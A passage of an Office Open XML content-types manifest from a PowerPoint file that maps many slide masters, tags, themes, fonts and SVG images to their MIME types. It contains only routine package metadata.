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fonts/font1.fntdata" ContentType="application/x-fontdata"/>
  <Override PartName="/ppt/handoutMasters/handoutMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.handoutMaster+xml"/>
  <Override PartName="/ppt/media/image1.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image2.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image3.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image4.svg" ContentType="image/svg+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Masters/slideMaster13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster64.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ppt/tags/tag337.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag338.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag339.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag340.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag341.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag342.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag343.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag344.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag345.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag346.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag347.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag348.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag349.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag350.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag351.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag352.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag353.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag354.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag355.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag356.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag357.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag358.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag359.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag360.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag361.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag362.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag363.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag364.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag365.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag366.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag367.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag368.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag369.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag370.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag371.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag372.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag373.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag374.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag375.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag376.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag377.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag378.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag379.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag380.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag381.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag382.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag383.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag384.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag385.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag386.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag387.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag388.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag389.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag390.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag391.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag392.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag393.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag394.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag395.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag396.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag397.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag398.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag39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00.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag401.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag402.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag403.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag404.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag405.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag406.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag407.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag408.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag409.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag410.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag411.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag412.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag413.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag414.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag415.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag416.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag417.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag418.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag419.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag420.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag421.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag422.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag423.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag424.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag425.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag426.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag427.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag428.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag429.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag430.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag431.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag432.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag433.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag434.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag435.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag436.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag437.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag438.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag439.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag440.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag441.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag442.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag443.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag444.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag445.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag446.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag447.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag448.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag449.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag450.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag451.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag452.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag453.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag454.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag455.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag456.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag457.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag458.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag459.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag460.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag461.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag462.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag463.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag464.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag465.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag466.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag467.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag468.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag469.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag470.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag471.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag472.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag473.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag474.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag475.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10.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme11.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme12.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme13.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme14.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme15.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme16.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme17.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme18.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme19.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme2.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme20.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme21.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme22.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme23.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme24.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme25.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme26.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme27.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme28.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme29.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme30.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme31.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme32.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme33.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme34.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme35.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme36.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme37.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme38.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme39.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme40.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
